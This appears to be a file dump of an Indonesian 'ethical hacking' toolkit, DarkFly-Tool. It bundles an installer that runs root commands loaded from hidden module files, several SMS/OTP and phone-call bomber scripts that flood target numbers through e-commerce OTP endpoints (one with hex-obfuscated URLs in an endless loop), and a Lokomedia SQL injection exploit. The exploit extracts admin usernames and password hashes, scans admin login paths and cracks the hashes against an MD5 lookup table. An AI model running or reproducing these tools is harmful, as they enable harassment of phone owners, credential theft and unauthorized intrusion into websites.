43 |
--------------------------------------------------------------------------------
/install.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | """
4 | Author : Ms.ambari
5 | contact : ambari.developer@gmail.com
6 | Github : https://github.com/Ranginang67
7 | my youtube channel : Ms.ambari
8 |
9 | subcribe my youtube Channel to learn ethical Hacking ^_^
10 | """
11 |
12 | import sys
13 | import os.path
14 | import subprocess
15 |
16 | ntfile = ['.module', 'lib']
17 |
18 | ubuntu = '' + str(open('.module/jalurU.ms').read())
19 | termux = '' + str(open('.module/jalurT.ms').read())
20 | termlb = '' + str(open('.module/ngentot.ms').read())
21 | instal = '' + str(open('.module/IN.ms').read())
22 |
23 |
24 | def _main_():
25 | if os.path.isdir('' + ubuntu.strip()):
26 | if os.getuid() != 0:
27 | print '[x] Failed: your must be root'
28 | sys.exit()
29 |
30 | if not os.path.isdir(ntfile[0]):
31 | print '[x] Failed: no directory module'
32 | sys.exit()
33 |
34 | if not os.path.isdir(ntfile[1]):
35 | print '[x] Failed: no directory lib'
36 | sys.exit()
37 | else:
38 |
39 | print '' + instal.strip()
40 |
41 | # ==================================================================#
42 |
43 | os.system('python .module/files/' + str(open('.module/A.ms'
44 | ).read()))
45 | os.system('python .module/files/' + str(open('.module/B.ms'
46 | ).read()))
47 | os.system('python .module/files/' + str(open('.module/C.ms'
48 | ).read()))
49 | os.system('python .module/files/' + str(open('.module/D.ms'
50 | ).read()))
51 | os.system('python .module/files/' + str(open('.module/E.ms'
52 | ).read()))
53 | os.system('python .module/files/' + str(open('.module/F.ms'
54 | ).read()))
55 | os.system('python .module/files/' + str(open('.module/G.ms'
56 | ).read()))
57 | os.system('python .module/files/' + str(open('.module/H.ms'
58 | ).read()))
59 |
60 | # ==================================================================#
61 |
62 | if os.path.isdir('/usr/bin/lib'):
63 | os.system('rm -rf /usr/bin/lib')
64 | os.system('' + str(open('.module/pindahU.ms').read()))
65 | os.system('' + str(open('.module/PindahU.ms').read()))
66 |
67 | if not os.path.isdir('/usr/bin/lib'):
68 | os.system('' + str(open('.module/pindahU.ms').read()))
69 | os.system('' + str(open('.module/PindahU.ms').read()))
70 |
71 | # ==================================================================#
72 |
73 | print '' + str(open('.module/DU.la').read())
74 | print '' + str(open('.module/Du').read())
75 | os.system('python .JM.xn')
76 |
77 | # ==================================================================#
78 |
79 | if os.path.isdir('' + termux.strip()):
80 | if not os.path.isdir('' + termux.strip()):
81 | sys.exit()
82 |
83 | if not os.path.isdir(ntfile[0]):
84 | print '[x] Failed: no directory module'
85 | sys.exit()
86 |
87 | if not os.path.isdir(ntfile[1]):
88 | print '[x] Failed: no directory lib'
89 | sys.exit()
90 | else:
91 |
92 | print '' + instal.strip()
93 |
94 | # ==============================================================#
95 |
96 | os.system('python2 .module/' + str(open('.module/A.ms'
97 | ).read()))
98 | os.system('python2 .module/' + str(open('.module/B.ms'
99 | ).read()))
100 | os.system('python2 .module/' + str(open('.module/C.ms'
101 | ).read()))
102 | os.system('python2 .module/' + str(open('.module/D.ms'
103 | ).read()))
104 | os.system('python2 .module/' + str(open('.module/E.ms'
105 | ).read()))
106 | os.system('python2 .module/' + str(open('.module/F.ms'
107 | ).read()))
108 | os.system('python2 .module/' + str(open('.module/G.ms'
109 | ).read()))
110 | os.system('python2 .module/' + str(open('.module/H.ms'
111 | ).read()))
112 |
113 | # ==============================================================#
114 |
115 | if os.path.isdir('' + termlb.strip()):
116 | os.system('' + str(open('.module/pacar.ms').read()))
117 | os.system('' + str(open('.module/pindahT.ms').read()))
118 | os.system('' + str(open('.module/PINDAHT.txt').read()))
119 |
120 | if not os.path.isdir('' + termlb.strip()):
121 | os.system('' + str(open('.module/pindahT.ms').read()))
122 | os.system('' + str(open('.module/PINDAHT.txt').read()))
123 |
124 | # ==============================================================#
125 |
126 | print '' + str(open('.module/DU.la').read())
127 | print '' + str(open('.module/Du').read())
128 | os.system('python2 .JM.xn && cd')
129 |
130 |
131 | # ==============================================================#
132 |
133 | if __name__ == '__main__':
134 | _main_()
135 |
--------------------------------------------------------------------------------
/lib/PHD.php:
--------------------------------------------------------------------------------
1 | no = "$a";
16 | echo "Jumlah Pesan: ";
17 | $b = trim(fgets(STDIN));
18 | $loop = "$b";
19 | for ($i=0; $i < $loop; $i++) {
20 | $init->Verif($init->no);
21 | }
22 |
--------------------------------------------------------------------------------
/lib/_.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ranginang67/DarkFly-Tool/9a989f1364c9e74345c2f40d0d4448ee57e69fc9/lib/_.pyc
--------------------------------------------------------------------------------
/lib/_0_.py:
--------------------------------------------------------------------------------
1 | # Program= Ular
2 | # Mod By= Ambari Channel
3 | # Use ARROW KEYS to play, SPACE BAR for pausing/resuming and Esc Key for exiting
4 |
5 | import curses
6 | from curses import KEY_RIGHT, KEY_LEFT, KEY_UP, KEY_DOWN
7 | from random import randint
8 |
9 | print" _ _ _"
10 | print" / \ _ __ ___ | |__ __ _ _ __ (_)"
11 | print" / _ \ | '_ ` _ \ | '_ \ / _` | | '__| | |"
12 | print" / ___ \ | | | | | | | |_) | | (_| | | | | |"
13 | print"/_/ \_\ |_| |_| |_| |_.__/ \__,_| |_| |_|"
14 | print
15 | print" ____ _ _"
16 | print"/ ___| | |__ __ _ _ __ _ __ ___ | |"
17 | print"|| | '_ \ / _` | | '_ \ | '_ \ / _ \ | |"
18 | print"||___ | | | | | (_| | | | | | | | | | | __/ | |"
19 | print"\____| |_| |_| \__,_| |_| |_| |_| |_| \___| |_|"
20 | print
21 | print
22 | start = raw_input ("#Start Sekarang?[y/n]:")
23 |
24 | curses.initscr()
25 | win = curses.newwin(20, 60, 0, 0)
26 | win.keypad(1)
27 | curses.noecho()
28 | curses.curs_set(0)
29 | win.border(0)
30 | win.nodelay(1)
31 |
32 | key = KEY_RIGHT # Initializing values
33 | score = 0
34 |
35 | snake = [[4,10], [4,9], [4,8]] # Initial snake co-ordinates
36 | food = [10,20] # First food co-ordinates
37 |
38 | win.addch(food[0], food[1], '*') # Prints the food
39 |
40 | while key != 27: # While Esc key is not pressed
41 | win.border(0)
42 | win.addstr(0, 2, 'Score : ' + str(score) + ' ') # Printing 'Score' and
43 | win.addstr(0, 27, ' Ular ') # 'SNAKE' strings
44 | win.timeout(150 - (len(snake)/5 + len(snake)/10)%120) # Increases the speed of Snake as its length increases
45 |
46 | prevKey = key # Previous key pressed
47 | event = win.getch()
48 | key = key if event == -1 else event
49 |
50 |
51 | if key == ord(' '): # If SPACE BAR is pressed, wait for another
52 | key = -1 # one (Pause/Resume)
53 | while key != ord(' '):
54 | key = win.getch()
55 | key = prevKey
56 | continue
57 |
58 | if key not in [KEY_LEFT, KEY_RIGHT, KEY_UP, KEY_DOWN, 27]: # If an invalid key is pressed
59 | key = prevKey
60 |
61 | # Calculates the new coordinates of the head of the snake. NOTE: len(snake) increases.
62 | # This is taken care of later at [1].
63 | snake.insert(0, [snake[0][0] + (key == KEY_DOWN and 1) + (key == KEY_UP and -1), snake[0][1] + (key == KEY_LEFT and -1) + (key == KEY_RIGHT and 1)])
64 |
65 | # If snake crosses the boundaries, make it enter from the other side
66 | if snake[0][0] == 0: snake[0][0] = 18
67 | if snake[0][1] == 0: snake[0][1] = 58
68 | if snake[0][0] == 19: snake[0][0] = 1
69 | if snake[0][1] == 59: snake[0][1] = 1
70 |
71 | # Exit if snake crosses the boundaries (Uncomment to enable)
72 | #if snake[0][0] == 0 or snake[0][0] == 19 or snake[0][1] == 0 or snake[0][1] == 59: break
73 |
74 | # If snake runs over itself
75 | if snake[0] in snake[1:]: break
76 |
77 |
78 | if snake[0] == food: # When snake eats the food
79 | food = []
80 | score += 1
81 | while food == []:
82 | food = [randint(1, 18), randint(1, 58)] # Calculating next food's coordinates
83 | if food in snake: food = []
84 | win.addch(food[0], food[1], '*')
85 | else:
86 | last = snake.pop() # [1] If it does not eat the food, length decreases
87 | win.addch(last[0], last[1], ' ')
88 | win.addch(snake[0][0], snake[0][1], '#')
89 |
90 | curses.endwin()
91 | print("\nScore - " + str(score))
92 | print("MOD By Ambari Channel")
--------------------------------------------------------------------------------
/lib/__.py:
--------------------------------------------------------------------------------
1 | import _
2 | ilucx.start()
--------------------------------------------------------------------------------
/lib/bomkfc.php:
--------------------------------------------------------------------------------
1 | no;
73 | $data = "fullname=wahhuwauh+ayam&handphone={$no}&email={$this->angka()}{$this->huruf()}%40gmail.com&password=peler123&confirm_password=peler123&language_id=ID&X-API-KEY=563f204a20876f1fa0b20523bdfd0728";
74 | $send = $this->sendC($url, null, $data);
75 | if (preg_match('/Invalid Handphone Number!/', $send)) {
76 | print('OTP send failed'); 77 | flush(); 78 | ob_flush(); 79 | sleep(1); 80 | } else { 81 | print('OTP send success
'); 82 | flush(); 83 | ob_flush(); 84 | sleep(1); 85 | } 86 | } 87 | 88 | 89 | } 90 | 91 | 92 | 93 | -------------------------------------------------------------------------------- /lib/bommthrml.php: -------------------------------------------------------------------------------- 1 | email; 52 | $pass = $this->pass; 53 | $data = "email={$email}&passwd={$pass}"; 54 | $send = $this->sendC($url, null, $data); 55 | if (preg_match('/sukses/', $send)) { 56 | // print('Login success
'); 57 | } else { 58 | // print("Login failed
"); 59 | } 60 | } 61 | 62 | public function Verif() 63 | { 64 | $url = "https://www.mataharimall.com/user/ajax/requestotp"; 65 | $no = $this->no; 66 | $data = "phone_number={$no}"; 67 | $send = $this->sendC($url, null, $data); 68 | if (preg_match('/Kode OTP berhasil dikirim/', $send)) { 69 | print('send success'); 70 | } else { 71 | print('send failed'); 72 | } 73 | } 74 | 75 | 76 | } 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /lib/func.php: -------------------------------------------------------------------------------- 1 | no; 51 | $type = $this->type; 52 | if ($type == 1) { 53 | $data = "msisdn={$no}&accept="; 54 | }elseif ($type == 2) { 55 | $data = "msisdn={$no}&accept=call"; 56 | } 57 | $send = $this->sendC($url, null, $data); 58 | // echo $send; 59 | if (preg_match('/otp_attempt_left/', $send)) { 60 | print('LiteSpam Sukses!★'); 61 | } else { 62 | print('Gagal Dikirim!★'); 63 | } 64 | } 65 | 66 | 67 | } 68 | 69 | 70 | 71 | -------------------------------------------------------------------------------- /lib/hac.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /lib/jd.id.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /lib/kfc.php: -------------------------------------------------------------------------------- 1 | no = "$a"; 24 | echo "Jumlah Pesan\nInput : "; 25 | $b = trim(fgets(STDIN)); 26 | $loop = "$b"; 27 | for ($i=0; $i < $loop; $i++) { 28 | $init->Verif($init->no); 29 | } 30 | 31 | -------------------------------------------------------------------------------- /lib/lazada.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # bomber lazada || 23-12-2017 3 | # gunakan ini sebagai pembelajaran saja! 4 | import lazada_bomber 5 | # __ __ 6 | # / /_ ____ ____ ___ / /_ ___ _____ 7 | # / __ \/ __ \/ __ `__ \/ __ \/ _ \/ ___/ 8 | # / /_/ / /_/ / / / / / / /_/ / __/ / 9 | #/_.___/\____/_/ /_/ /_/_.___/\___/_/ 10 | # /_/thePriVat bomber lazada -------------------------------------------------------------------------------- /lib/lazada_bomber.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ranginang67/DarkFly-Tool/9a989f1364c9e74345c2f40d0d4448ee57e69fc9/lib/lazada_bomber.pyc -------------------------------------------------------------------------------- /lib/lite.php: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env php 2 | ".$X."\n"); 34 | case SIGKILL: 35 | die($Y."\n=========================== Cvar1984 ))=====(@)>".$X."\n"); 36 | case SIGINT: 37 | die($Y."\n=========================== Cvar1984 ))=====(@)>".$X."\n"); 38 | } 39 | } 40 | pcntl_signal(SIGTERM, "signal_handler"); 41 | pcntl_signal(SIGINT, "signal_handler"); 42 | } 43 | function post_data($url,$data) { 44 | global $ua; 45 | $ch=curl_init($url); 46 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 47 | curl_setopt($ch, CURLOPT_USERAGENT, $ua); 48 | curl_setopt($ch, CURLOPT_POSTFIELDS, $data); 49 | curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 50 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); 51 | return curl_exec($ch); 52 | curl_close($ch); 53 | } 54 | echo $Y. 55 | " 56 | _ _ _ ___ _____ ____ 57 | | | (_) |_ ___ / _ \_ _| _ \ 58 | | | | | __/ _ \ | | || | | |_) | 59 | | |___| | || __/ |_| || | | __/ 60 | |_____|_|\__\___|\___/ |_| |_|"; 61 | echo $R."\n++++++++++++++++++++++++++++++++++++++"; 62 | echo $B."\nAuthor : Cvar1984 ".$R.'+'; 63 | echo $B."\nGithub : https://github.com/Cvar1984".$R.'+'; 64 | echo $B."\nTeam : BlackHole Security ".$R.'+'; 65 | echo $B."\nVersion : 2.4 ".$R.'+'; 66 | echo $B."\nDate : 13-03-2018 ".$R.'+'; 67 | echo $R."\n++++++++++++++++++++++++++++++++++++++".$G.$X."\n\n"; 68 | isset($argv[1]) OR die($RR."[!] Input No List [!]\n".$X); 69 | if(is_numeric($argv[1])) { 70 | echo "Calling -> ".$G.$argv[1].$X."\n"; 71 | post_data("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x6b\x6f\x63\x61\x73\x68\x2e\x63\x6f\x6d\x2f\x6f\x61\x75\x74\x68\x2f\x6f\x74\x70","msisdn=".$argv[1]."&accept=call"); 72 | while(1) { 73 | echo "Send OTP To -> ".$G.$argv[1].$X."\n"; 74 | post_data("\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x2e\x6a\x64\x2e\x69\x64\x2f\x70\x68\x6f\x6e\x65\x2f\x73\x65\x6e\x64\x50\x68\x6f\x6e\x65\x53\x6d\x73","phone=".$argv[1]."&smsType=1"); 75 | post_data("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x70\x68\x64\x2e\x63\x6f\x2e\x69\x64\x2f\x65\x6e\x2f\x75\x73\x65\x72\x73\x2f\x73\x65\x6e\x64\x4f\x54\x50","phone_number=".$argv[1]); 76 | } 77 | } 78 | if(!file_exists($argv[1])) { 79 | die($RR."[!] File Not Exists [!]".$X."\n"); 80 | } 81 | $argv[1]=explode("\n",file_get_contents($argv[1])); 82 | $argv[1]=str_replace(' ','',$argv[1]); 83 | foreach($argv[1] as $argv[2]): 84 | echo "Calling -> ".$G.$argv[2].$X."\n"; 85 | post_data("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x6b\x6f\x63\x61\x73\x68\x2e\x63\x6f\x6d\x2f\x6f\x61\x75\x74\x68\x2f\x6f\x74\x70","msisdn=".$argv[2]."&accept=call"); 86 | endforeach; 87 | while(1) { 88 | foreach($argv[1] as $argv[2]): 89 | echo "Send OTP To -> ".$G.$argv[2].$X."\n"; 90 | post_data("\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x2e\x6a\x64\x2e\x69\x64\x2f\x70\x68\x6f\x6e\x65\x2f\x73\x65\x6e\x64\x50\x68\x6f\x6e\x65\x53\x6d\x73","phone=".$argv[2]."&smsType=1"); 91 | post_data("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x70\x68\x64\x2e\x63\x6f\x2e\x69\x64\x2f\x65\x6e\x2f\x75\x73\x65\x72\x73\x2f\x73\x65\x6e\x64\x4f\x54\x50","phone_number=".$argv[2]); 92 | endforeach; 93 | } -------------------------------------------------------------------------------- /lib/lokmed.php: -------------------------------------------------------------------------------- 1 | Lokomedia (SQL Injection) + Auto Scan Admin Login <--\n"; 16 | print " ## Coded by Mr. Error 404 (l0c4lh34rtz) - IndoXploit - Sanjungan Jiwa ##\n"; 17 | print " # greetz: res7ock crew - j*ncok Sec #\n"; 18 | print "+++++++ usage: php namafile.php target.txt +++++++\n"; 19 | print "[ =========================================================================== ]\n\n"; 20 | } 21 | function ngcurl($url) { 22 | $curl = curl_init($url); 23 | curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); 24 | curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); 25 | $content = curl_exec($curl); 26 | curl_close($curl); 27 | return $content; 28 | } 29 | function simpen($isi) { 30 | $f = fopen("md5.txt", "a+"); 31 | fwrite($f, "$isi\n"); 32 | fclose($f); 33 | } 34 | 35 | $admin = array( 36 | 'adm/', 37 | '_adm_/', 38 | '_admin_/', 39 | '_administrator_/', 40 | 'operator/', 41 | 'sika/', 42 | 'develop/', 43 | 'ketua/', 44 | 'redaktur/', 45 | 'author', 46 | 'admin/', 47 | 'administrator/', 48 | 'adminweb/', 49 | 'user/', 50 | 'users/', 51 | 'dinkesadmin/', 52 | 'retel/', 53 | 'author/', 54 | 'panel/', 55 | 'paneladmin/', 56 | 'panellogin/', 57 | 'redaksi/', 58 | 'cp-admin/', 59 | 'master/', 60 | 'master/index.php', 61 | 'master/login.php', 62 | 'operator/index.php', 63 | 'sika/index.php', 64 | 'develop/index.php', 65 | 'ketua/index.php', 66 | 'redaktur/index.php', 67 | 'admin/index.php', 68 | 'administrator/index.php', 69 | 'adminweb/index.php', 70 | 'user/index.php', 71 | 'users/index.php', 72 | 'dinkesadmin/index.php', 73 | 'retel/index.php', 74 | 'author/index.php', 75 | 'panel/index.php', 76 | 'paneladmin/index.php', 77 | 'panellogin/index.php', 78 | 'redaksi/index.php', 79 | 'cp-admin/index.php', 80 | 'operator/login.php', 81 | 'sika/login.php', 82 | 'develop/login.php', 83 | 'ketua/login.php', 84 | 'redaktur/login.php', 85 | 'admin/login.php', 86 | 'administrator/login.php', 87 | 'adminweb/login.php', 88 | 'user/login.php', 89 | 'users/login.php', 90 | 'dinkesadmin/login.php', 91 | 'retel/login.php', 92 | 'author/login.php', 93 | 'panel/login.php', 94 | 'paneladmin/login.php', 95 | 'panellogin/login.php', 96 | 'redaksi/login.php', 97 | 'cp-admin/login.php', 98 | 'terasadmin/', 99 | 'terasadmin/index.php', 100 | 'terasadmin/login.php', 101 | 'rahasia/', 102 | 'rahasia/index.php', 103 | 'rahasia/admin.php', 104 | 'rahasia/login.php', 105 | 'dinkesadmin/', 106 | 'dinkesadmin/login.php', 107 | 'adminpmb/', 108 | 'adminpmb/index.php', 109 | 'adminpmb/login.php', 110 | 'system/', 111 | 'system/index.php', 112 | 'system/login.php', 113 | 'webadmin/', 114 | 'webadmin/index.php', 115 | 'webadmin/login.php', 116 | 'wpanel/', 117 | 'wpanel/index.php', 118 | 'wpanel/login.php', 119 | 'adminpanel/index.php', 120 | 'adminpanel/', 121 | 'adminpanel/login.php', 122 | 'adminkec/', 123 | 'adminkec/index.php', 124 | 'adminkec/login.php', 125 | 'admindesa/', 126 | 'admindesa/index.php', 127 | 'admindesa/login.php', 128 | 'adminkota/', 129 | 'adminkota/index.php', 130 | 'adminkota/login.php', 131 | 'admin123/', 132 | 'admin123/index.php', 133 | 'admin123/login.php', 134 | 'logout/', 135 | 'logout/index.php', 136 | 'logout/login.php', 137 | 'logout/admin.php', 138 | 'adminweb_setting', 139 | ); 140 | $real_pass = array( 141 | "a66abb5684c45962d887564f08346e8d" => "admin123456", 142 | "99026ab4ab3de96f3d7ae33c8c85057b" => "master!@#$qwe", 143 | "c630643500720b255abb22e2ab2c31f6" => "sumedang123", 144 | "1c63129ae9db9c60c3e8aa94d3e00495" => "1qaz2wsx", 145 | "f243df64be7184fb0fc07bd6cf53185b" => "b1smillah", 146 | "93261ae77f0df5522dd9767203f3aa17" => "house69", 147 | "f243df64be7184fb0fc07bd6cf53185b" => "b1smillah", 148 | "37c77ada62ec68d1b740717fc886bef6" => "Suk4bum1", 149 | "d39b59b946b414c4e5926f9c7b23840a" => "kasitaugakya", 150 | "fbff29af096fa646757ce8439b644714" => "vro190588", 151 | "1feadc10e93f2b64c65868132f1e72d3" => "agoes", 152 | "0192023a7bbd73250516f069df18b500" => "admin123", 153 | "7aa1dfee8619ac8f282e296d83eb55ff" => "meong", 154 | "24fa5ee2c1285e115dd6b5fe1c25a333" => "773062", 155 | "d557fd4686821b5d8b927cdfe6e67d21" => "#admin#", 156 | "5fec4ba8376f207d1ff2f0cac0882b01" => "admin!@#", 157 | "a01726b559eeeb5fc287bf0098a22f6c" => "@dm1n", 158 | "73acd9a5972130b75066c82595a1fae3" => "ADMIN", 159 | "511f2efed0e465e700a951f2f1ecec19" => "bs1unt46", 160 | "7b7bc2512ee1fedcd76bdc68926d4f7b" => "Administrator", 161 | "99fedb09f0f5da90e577784e5f9fdc23" => "ADMINISTRATOR", 162 | "e58bfd635502ea963e1d52487ac2edfa" => "!@#123!@#123", 163 | "5449ccea16d1cc73990727cd835e45b5" => "ngadimin", 164 | "c21f969b5f03d33d43e04f8f136e7682" => "default", 165 | "1a1dc91c907325c69271ddf0c944bc72" => "pass", 166 | "fffdf0489f264598e9d35cba0381e9ac" => "sukmapts", 167 | "5f4dcc3b5aa765d61d8327deb882cf99" => "password", 168 | "5ebe2294ecd0e0f08eab7690d2a6ee69" => "secret", 169 | "c893bad68927b457dbed39460e6afd62" => "prueba", 170 | "b2ca9cfa6067282a031d28a54886822d" => "admin4343", 171 | "3a3795bb61d5377545b4f345ff223e3d" => "bingo", 172 | "e172dd95f4feb21412a692e73929961e" => "bismillah", 173 | "8221303fbf816fd9da96be7dd4c92f99" => "salawarhandap123", 174 | "0570e3795fbe97ddd3ce53be141d1aed" => "indoxploit", 175 | "098f6bcd4621d373cade4e832627b4f6" => "test", 176 | "976adc43eaf39b180d9f2c624a1712cd" => "adminppcp", 177 | "5985609a2dc01098797c94a43e0a1115" => "masarief", 178 | "21232f297a57a5a743894a0e4a801fc3" => "admin", 179 | "1870a829d9bc69abf500eca6f00241fe" => "wordpress", 180 | "126ac9f6149081eb0e97c2e939eaad52" => "blog", 181 | "fe01ce2a7fbac8fafaed7c982a04e229" => "demo", 182 | "04e484000489dd3b3fb25f9aa65305c6" => "redaksi2016", 183 | "91f5167c34c400758115c2a6826ec2e3" => "administrador", 184 | "200ceb26807d6bf99fd6f4f0d1ca54d4" => "administrator", 185 | "c93ccd78b2076528346216b3b2f701e6" => "admin1234", 186 | "912ec803b2ce49e4a541068d495ab570" => "asdf", 187 | "1adbb3178591fd5bb0c248518f39bf6d" => "asdf1234", 188 | "e99a18c428cb38d5f260853678922e03" => "abc123", 189 | "a152e841783914146e4bcd4f39100686" => "asdfgh", 190 | "a384b6463fc216a5f8ecb6670f86456a" => "qwert", 191 | "d8578edf8458ce06fbc5bb76a58c5ca4" => "qwerty", 192 | "b59c67bf196a4758191e42f76670ceba" => "1111", 193 | "96e79218965eb72c92a549dd5a330112" => "111111", 194 | "4297f44b13955235245b2497399d7a93" => "123123", 195 | "c33367701511b4f6020ec61ded352059" => "654321", 196 | "81dc9bdb52d04dc20036dbd8313ed055" => "1234", 197 | "e10adc3949ba59abbe56e057f20f883e" => "123456", 198 | "fcea920f7412b5da7be0cf42b8c93759" => "1234567", 199 | "25d55ad283aa400af464c76d713c07ad" => "12345678", 200 | "25f9e794323b453885f5181f1b624d0b" => "123456789", 201 | "e807f1fcf82d132f9bb018ca6738a19f" => "1234567890", 202 | "befe9f8a14346e3e52c762f333395796" => "qawsed", 203 | "76419c58730d9f35de7ac538c2fd6737" => "qazwsx", 204 | "5f4dcc3b5aa765d61d8327deb882cf99" => "password", 205 | "bed128365216c019988915ed3add75fb" => "passw0rd", 206 | "21232f297a57a5a743894a0e4a801fc3" => "admin", 207 | "e10adc3949ba59abbe56e057f20f883e" => "123456", 208 | "5f4dcc3b5aa765d61d8327deb882cf99" => "password", 209 | "25d55ad283aa400af464c76d713c07ad" => "12345678", 210 | "f379eaf3c831b04de153469d1bec345e" => "666666", 211 | "96e79218965eb72c92a549dd5a330112" => "111111", 212 | "fcea920f7412b5da7be0cf42b8c93759" => "1234567", 213 | "d8578edf8458ce06fbc5bb76a58c5ca4" => "qwerty", 214 | "6f3cac6213ffceee27cc85414f458caa" => "siteadmin", 215 | "200ceb26807d6bf99fd6f4f0d1ca54d4" => "administrator", 216 | "63a9f0ea7bb98050796b649e85481845" => "root", 217 | "4297f44b13955235245b2497399d7a93" => "123123", 218 | "c8837b23ff8aaa8a2dde915473ce0991" => "123321", 219 | "e807f1fcf82d132f9bb018ca6738a19f" => "1234567890", 220 | "4ca7c5c27c2314eecc71f67501abb724" => "letmein123", 221 | "cc03e747a6afbbcbf8be7668acfebee5" => "test123", 222 | "62cc2d8b4bf2d8728120d052163a77df" => "demo123", 223 | "32250170a0dca92d53ec9624f336ca24" => "pass123", 224 | "46f94c8de14fb36680850768ff1b7f2a" => "123qwe", 225 | "200820e3227815ed1756a6b531e7e0d2" => "qwe123", 226 | "c33367701511b4f6020ec61ded352059" => "654321", 227 | "f74a10e1d6b2f32a47b8bcb53dac5345" => "loveyou", 228 | "172eee54aa664e9dd0536b063796e54e" => "adminadmin123", 229 | "e924e336dcc4126334c852eb8fadd334" => "waskita1234", 230 | "02631cc1d0cc5bda188566e90d0ae16c" => "rsamku2013", 231 | "b69cbef044eac6fc514a2988e62c5b30" => "unlock08804", 232 | "12e110a1b89da9b09a191f1f9b0a1398" => "nalaratih", 233 | "f70d32432ff0a8984b5aadeb159f9db6" => "Much240316", 234 | "a2fffa77aa0dde8cd4c416b5114eba21" => "gondola", 235 | "2b45af95ce316ea4cffd2ce4093a2b83" => "w4nd3szaki", 236 | "c5612a125d8613ddae79a6b36c8bee37" => "Reddevil#21", 237 | "6e7fbe8e6147e2c430ce7e8ab883e533" => "R4nd0m?!", 238 | "5136850b6c8f3ebc66122188347efda0" => "adminku", 239 | "5214905fbe8d7f0bb0d0a328f08af3f0" => "adminpust4k4", 240 | "acfc976c2d22e4a595a9ee6fc0d05f27" => "dikmen2016", 241 | "dcdee606657b5f7d8b218badfeb22a90" => "masputradmin", 242 | "ecb4208ee41389259a632d3a733c2786" => "741908", 243 | "827ccb0eea8a706c4c34a16891f84e7b" => "12345", 244 | "855be097acdf2fea4e342615a154ca3c" => "tolol", 245 | "eeee80342778e7b497d507f89094b10d" => "master10", 246 | "d29c0398602e6cf005f0dcb7a0443c7d" => "adminjalan", 247 | "9062756924cf10763cc89cf2793a77ab" => "pass4@nd1", 248 | "8b6bc5d8046c8466359d3ac43ce362ab" => "ganteng", 249 | "528d06a172eb2d8fab4e93f33f3986a8" => "jasindolive", 250 | "058fe7f85df1e992ef7bf948f1db7842" => "404J", 251 | "abe1f4492f922a9111317ed7f7f8e723" => "bantarjati5", 252 | ); 253 | $sites = explode("\n", file_get_contents($argv[1])); 254 | if(isset($argv[1])) { 255 | cover(); 256 | foreach($sites as $url) { 257 | if(!preg_match("/^http:\/\//", $url) AND !preg_match("/^https:\/\//", $url)) { 258 | $url = "http://$url"; 259 | } else { 260 | $url = $url; 261 | } 262 | $statis = ""; 263 | $sisa = ""; 264 | $login = ""; 265 | $param_list = array("statis","kategori","berita"); 266 | $curl = ngcurl($url); 267 | $curl = str_replace("'", '"', $curl); 268 | foreach($param_list as $param) { 269 | preg_match_all("/$param-(.*?)\">/", $curl, $id); 270 | foreach($id[1] as $stat) { 271 | $pecah = explode("-", $stat); 272 | $statis .= $pecah[0]; 273 | $sisa .= $pecah[1]; 274 | break; 275 | } 276 | foreach($admin as $adminweb) { 277 | $curl_admin = ngcurl("$url/$adminweb"); 278 | if(preg_match("/administrator|username|password/i", $curl_admin) AND !preg_match("/not found|forbidden|404|403|500/i", $curl_admin)) { 279 | $login .= "$url/$adminweb"; 280 | break; 281 | } 282 | } 283 | $sql = ngcurl("$url/$param-$statis'/*!50000UniON*/+/*!50000SeLeCT*/+/*!50000cOnCAt*/(0x696e646f78706c6f6974,0x3c6c693e,username,0x20,password,0x3c6c693e)+from+users--+---+-$sisa"); 284 | preg_match("//", $sql, $up); 285 | preg_match("/